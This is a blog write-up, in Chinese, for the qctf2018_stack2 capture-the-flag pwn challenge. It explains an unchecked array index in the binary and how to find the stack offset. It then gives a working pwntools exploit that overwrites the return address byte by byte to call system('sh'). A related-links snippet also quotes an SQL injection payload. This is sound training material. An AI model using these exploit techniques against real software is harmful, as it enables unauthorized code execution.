qctf2018_stack2

最新推荐文章于 2024-05-03 17:33:07 发布
最新推荐文章于 2024-05-03 17:33:07 发布
阅读量60 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132578503
版权

qctf2018_stack2

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x8047000)

32位,没开pie

有后门函数(不能用,出题人没有配置/bin/bash环境,但是又能用一点点

,只贴重要的

if ( v6 != 3 )
        break;
      puts("which number to change:");
      __isoc99_scanf("%d", &v5);
      puts("new number:");
      __isoc99_scanf("%d", &v7);
      v13[v5] = v7;
    }

数组没有检测边界,存在溢出

然后本题坑点来了,他不是正常的开辟栈空间,如果是正常的话

char v13[100]; // [esp+38h] [ebp-70h]

那就是偏移0x70

实际上看汇编代码

.text:080485D0 8D 4C 24 04                   lea     ecx, [esp+4]
.text:080485D4 83 E4 F0                      and     esp, 0FFFFFFF0h	//esp栈顶方向偏移4
.text:080485D7 FF 71 FC                      push    dword ptr [ecx-4]	//esp-4
.text:080485DA 55                            push    ebp				//esp-4
.text:080485DB 89 E5                         mov     ebp, esp

栈空间开辟是这样的

ASLR保护机制使低4位仍是固定的

main函数栈帧的ebp指针到返回地址的偏移仍然是固定的,且等于esp的低四位表示的字节数+4字节+4字节

在这里插入图片描述

所以偏移就是0xc+0x4+0x4+0x70=0x84

又因为没有/bin/bash环境我们需要rop一下

他每次只能改一个字节,一位一位改

ROPgadget --binary pwn --string 'sh'

#from pwn import*
#from Yapack import *

context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",28943,"./pwn",0)

sla(b'ave:',b'0')

offset=0x84

def write(pad,adr):
    sla(b'exit',b'3')
    sla(b'change:',str(offset+pad))
    sla(b'number:',str(adr))

#sys=0x080485B4
write(0,0xb4)
write(1,0x85)
write(2,0x04)
write(3,0x08)

#0x08048987 : sh
write(4,0x87)
write(5,0x89)
write(6,0x04)
write(7,0x08)
sla(b'exit',b'5')
ia()

在这里插入图片描述

参考链接:

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
qctf-school-2015:QCTF 学校 2015
06-06
QCTF 学校 2015 这是 QCTF School 2015 竞赛的开发库 - 面向学童的面对面 CTF 竞赛,由 Hackerdom 团队举办( )。 比赛于2015年5月10日举行。 QCTF校规可在大赛官网查看- 任务文件夹包含任务。 每个任务都在自己的文件夹中。 “示例”任务是最简单的示例。 每个作业文件夹都包含一个带有 Qoala 检查系统检查器的 .xml 文件( ) 部分任务取自并改编自作为 RuCTF 2015 全俄信息安全竞赛的一部分举办的个人奥林匹克竞赛。 所有作业的版权均归其作者所有。 维基上提供了作业细目: : 。 对于所有问题,请写信至 。
[BUUCTF-pwn]——suctf_2018_stack
Y_peak的博客
03-11 436
[BUUCTF-pwn]——suctf_2018_stack 题目地址:https://buuoj.cn/challenges#suctf_2018_stack 什么保护都没开 在IDA中一查看,发现有点简单太简单了.本来刚开始以为溢出空间不够只有两个地址,一个epb, 一个返回地址, 可是结果仅仅返回地址就可以了 exploit from pwn import * p = remote('node3.buuoj.cn',29819) leave_ret = 0x000000000040073
2018年的OpenStack存储更新
开源云中文社区
10-08 1820
自OpenStack第一次发布以来,已经差不多八年了。OpenStack已经向大家证明它有望在开源私有云上开启新时代。我们见证了OpenStack的起起落落,现在它进入了...
QCTF2018stack2------<ASLR保护机制>
qq_21746331的博客
12-27 467
QCTF2018_stack2前言知识点详解0x1 ASLR保护机制writeupexp 前言 在最简单的栈溢出中,如果程序中存在获取shell的后门函数,则只需要简单的通过溢出手段将函数的返回地址修改为后门函数的地址,便可以轻松获取shell。而对于没有提供后门函数的程序,可以通过往栈里面写入shellcode,在返回的时候将控制流劫持到栈里面的shellcode获取shell。但是对于加入NX保护的程序,在栈中写入shellcode的方法则不再适用,而ROP就是其中一种绕过保护的手段。ROP的全称为R
[BUUCTF-pwn]——qctf2018_stack2
Y_peak的博客
04-02 347
[BUUCTF-pwn]——qctf2018_stack2 这道题注意一点v3的类型就好, 其他应该木有什么可以说的吧, 它是char*类型., 也就是每个我们赋值的v7只有低位的一个字节可以写进去 漏洞就在这里, 可以利用这里, 以v3为基准修改任意地址的数据. 还有一点需要注意的是偏移, 我最一开始写的时候, 想当然写成了0x40+4 主要原因是因为画圈的位置改变了esp, 懒得看汇编往上面找了直接动态调试. 第一次执行该汇编的时候, eax就是我们开始输入的位置 然后直接定位到retn看栈顶
qctf2018_stack2(数组越界,偏移寻找)
m0_51251108的博客
11-12 729
qctf2018_stack2: 程序分析: 漏洞出现在change这里,没有对v5作边界检查,我们能造成越界,直接读数到ret地址 后门函数: 两个小trick: 1.我们都会以为偏移是0x70+4,而实际却是0x84 跟着这位师傅的文章调试: https://zhuanlan.zhihu.com/p/301091515 首先ida找到首次出现v13的地方,可以看到在for循环里 我们接着看这部分的Text view 断点下在0x80486ae,得到v13真实地址为0xffffd028 继续调
pwn CTF 4th-QCTF-2018 stack2
qq_41071646的博客
01-23 3399
先把程序跑一遍看看·~~~~~~~ 然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~  然后我们 咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida 这里好像没有什么毛病  限制了 输入的数量是99 然后往下看   这里就是bug了    因为我们没有检查v13数组的边界 这里我们可...
[BUUCTF]PWN——qctf2018_stack2
mcmuyanga的博客
04-12 548
qctf2018_stack2 例行检查 ,32位程序,开启了canary和nx保护 本地运行一下,看看大概的情况 32位ida载入,检索字符串发现了后门 main函数太长了,贴一下关键部分,漏洞点在修改v13数组里的值。 利用数组越界漏洞去修改ret,将ret修改成backdoor即可。 一开始我想当然的认为偏移是0x70+4,但是实际利用的时候发现不对。动调找一下吧 我输入的数据是12,存储在了0xffffcf38处,v13数组的地址 找一下函数结束的时候esp的地址 相差0
通过遗传优化的小波阈值滤波降低ECG信号的噪声
02-25
设计了二次曲线阈值函数(QCTF)来实现阈值点的平滑连接。 此外,针对均方根误差和滤波平滑度,设计了一种新的遗传算法来针对不同的噪声信号自动搜索QCFT的最优参数。 最后,通过MIT-BIH心律失常数据库ECG记录评估...
数据结构-栈(C语言代码)
weixin_50246370的博客
08-12 5323
栈(stack)又名堆栈,它是一种运算受限的线性表。限定仅在表尾进行插入和删除操作的线性表。这一端被称为栈顶,相对地,把另一端称为栈底。向一个栈插入新元素又称作进栈、入栈或压栈,它是把新元素放到栈顶元素的上面,使之成为新的栈顶元素;从一个栈删除元素又称作出栈或退栈,它是把栈顶元素删除掉,使其相邻的元素成为新的栈顶元素。 #include <stdio.h> #include <stdlib.h> typedef struct Node { int data; struct.
全新桥隧坡安全监测解决方案,24h监测效率提升30%
Hi_Target的博客
04-30 1000
4月26日,交通运输部党组书记、部长李小鹏在部务会上强调,要高度重视公路桥梁隧道结构监测工作,抓紧推进公路桥梁隧道结构监测系统建设,进一步健全完善公路桥梁隧道结构监测长效运行机制。基于北斗高精度定位技术,采用高精度传感器,融合物联网、人工智能以及三维数字化仿真等技术,实时获取运营数据,掌握桥隧坡的运行状况,可有效减少维护成本,保障运营安全。具备振弦、电压、电流、差阻、RS485、RS232、开关量、继电器、RJ45接口。在全国各省份设有26家分公司,具备专业、高效的演示、演练、支撑、交付等本地化服务能力。
四川古力未来科技抖音小店安全:守护您的网购体验
lnqdds的博客
04-30 444
四川古力未来科技抖音小店以其严格的管理制度、先进的技术支持和完善的售后服务,为消费者提供了一个安全、可靠的购物环境。在互联网购物日益普及的今天,四川古力未来科技抖音小店以其独特的魅力和安全保障措施,成为越来越多消费者信赖的购物平台。平台致力于为消费者提供一个安全、可靠、便捷的购物环境,通过多重安全验证、数据加密等措施,确保消费者的购物信息和资金安全。同时,平台定期对商家进行监管和评估,对于存在违规行为的商家,将及时进行处理,确保消费者的购物权益不受损害。五、用户评价与信誉体系。六、加强用户教育与宣传。
安全运维 -- splunk 操作手册
leeezp的博客
04-30 1006
日常运维操作笔记 (持续更新)
撞库攻击是什么,如何进行有效的防护阻止
HoewDec的博客
04-30 1304
黑客通过收集互联网已泄露的用户和密码信息,生成对应的字典表,由于许多用户重复使用相同的用户名和密码,攻击者可以使用撞库攻击获得对其他网站上用户帐户未经授权的访问。威胁检测与分析依赖云端强大的基础数据收集系统 ,结合自主研发的多款、累计数十种提取方法的核心情报提取系统 ,快速且自动化的生产高覆盖度、高准确度、上下文丰富的情报数据。为各种不同类型的业务提供独特的价值。据统计,撞库攻击的成功率通常为1%到3%,但动辄数千万甚至上亿的泄露数据,最终成功的攻击可达上万,对于企业和个人来说危害性非常大。
什么是网络安全等级保护测评(等保测评)?
weixin_51347473的博客
04-29 704
它通过对信息和信息系统的安全性进行评估,发现并纠正存在的安全漏洞和隐患,提高信息系统的安全性和可靠性,保障信息的安全。1.提高信息和信息系统的安全性:通过等保测评,可以发现并纠正存在的安全漏洞和隐患,提高系统和数据的安全性和可靠性。2.进行现场调研和检测:对系统和数据进行现场调研和检测,了解系统和数据的安全状况和存在的问题。总之,等保测评是保障信息和信息系统安全的重要手段之一,对于企业和组织来说具有重要的意义和作用。1.确定测评目标和范围:明确要测评的信息和信息系统的范围和目标,了解业务需求和安全需求。
「 网络安全常用术语解读 」SBOM主流格式SWID详解
最新发布
网络安全
05-03 753
国际标准化组织(ISO)和国际电工委员会(International Electrotechnical Commission,IEC)发布了软件标识(Software Identification,SWID)标签标准,该标准定义了用于描述软件产品的结构化元数据格式。
网络安全实训Day16
Yisitelz的博客
04-26 2173
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
攻防世界 newscenter
09-08
最后,通过执行以下SQL语句search=-1' union select 1,version(),group_concat(fl4g) from secret_table --,我们可以得到flag的值为QCTF{sq1_inJec7ion_ezzz}。这是一个CTF比赛中的一个关卡,攻防世界的NewsCenter...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值